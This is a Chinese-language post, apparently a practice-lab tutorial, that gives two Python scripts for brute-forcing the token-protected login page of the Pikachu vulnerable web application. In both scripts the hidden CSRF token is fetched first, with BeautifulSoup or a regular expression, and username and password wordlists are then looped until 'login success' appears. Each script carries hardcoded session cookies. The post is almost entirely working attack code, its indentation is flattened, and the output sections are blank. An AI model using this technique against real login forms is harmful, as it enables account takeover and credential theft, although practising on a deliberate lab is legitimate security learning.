第一种——基于Beautiful Soup库(数据解析)和re模块
代码如下:
import re
import requests
from bs4 import BeautifulSoup
with open('user.txt','r') as user:
for username in user:
#print (username.strip())
with open('password.txt','r') as passwd:
for password in passwd:
#print (password.strip())
url = "http://x.x.x.x/pikachu/vul/burteforce/bf_token.php"
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
'Cookie': 'request_token=78gUEJrz2WPS3xN1XfqiXeGy2tgiHd8CxpzVAOSavBj4c8lA; pro_end=-1; ltd_end=-1; serverType=apache; order=id%20desc; memSize=1837; bt_user_info=%7B%22status%22%3Atrue%2C%22msg%22%3A%22%u83B7%u53D6%u6210%u529F%21%22%2C%22data%22%3A%7B%22username%22%3A%22151****1573%22%7D%7D; a3446a883d49d56e7e3ab64c9f2af2ad=d5a8f18a-489e-4beb-bca0-ee0272edea2f.b_FsvtXQq2JqFu6tBwn3MguJILs; JSESSIONID=B3B6110EF5A065700776C0554D642C4B; PHPSESSID=9cujklrgmm4qlsnhus8pa5ihbb'
}
r = requests.get(url,headers=header)
#print (r.text)
token = BeautifulSoup(r.text,'lxml').find('input',{'name':'token'}).get('value')#bs库匹配r.text
#print (token)
data = {
'username':username.strip(),
'password':password.strip(),
'token':token,
'submit':'Login'
}
res = requests.post(url=url,headers=header,data=data)
print (res.text)
if re.findall('login success',res.text):
print ('破解成功啦,杀世子,夺青鸟!')
print ("用户名是:", username.strip())
print ("密码是:", password.strip())
输出结果:

第二种——只基于re模块,正则表达式匹配
代码如下:
import re
import requests
#from bs4 import BeautifulSoup
with open('user.txt','r') as user:
for username in user:
#print (username.strip())
with open('password.txt','r') as passwd:
for password in passwd:
#print (password.strip())
url = "http://x.x.x.x/pikachu/vul/burteforce/bf_token.php"
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
'Cookie': 'request_token=78gUEJrz2WPS3xN1XfqiXeGy2tgiHd8CxpzVAOSavBj4c8lA; pro_end=-1; ltd_end=-1; serverType=apache; order=id%20desc; memSize=1837; bt_user_info=%7B%22status%22%3Atrue%2C%22msg%22%3A%22%u83B7%u53D6%u6210%u529F%21%22%2C%22data%22%3A%7B%22username%22%3A%22151****1573%22%7D%7D; a3446a883d49d56e7e3ab64c9f2af2ad=d5a8f18a-489e-4beb-bca0-ee0272edea2f.b_FsvtXQq2JqFu6tBwn3MguJILs; JSESSIONID=B3B6110EF5A065700776C0554D642C4B; PHPSESSID=9cujklrgmm4qlsnhus8pa5ihbb'
}
r = requests.get(url,headers=header)
#print (r.text)
#token = BeautifulSoup(r.text,'lxml').find('input',{'name':'token'}).get('value') #bs库匹配
token = re.findall('<input type="hidden" name="token" value="(.*?)"',r.text) #re正则表达式匹配
#print (token)
data = {
'username':username.strip(),
'password':password.strip(),
'token':token,
'submit':'Login'
}
res = requests.post(url=url,headers=header,data=data)
#print (res.text)
if re.findall('login success',res.text):
print ('破解成功啦,杀世子,夺青鸟!')
print ("用户名是:", username.strip())
print ("密码是:", password.strip())
输出结果: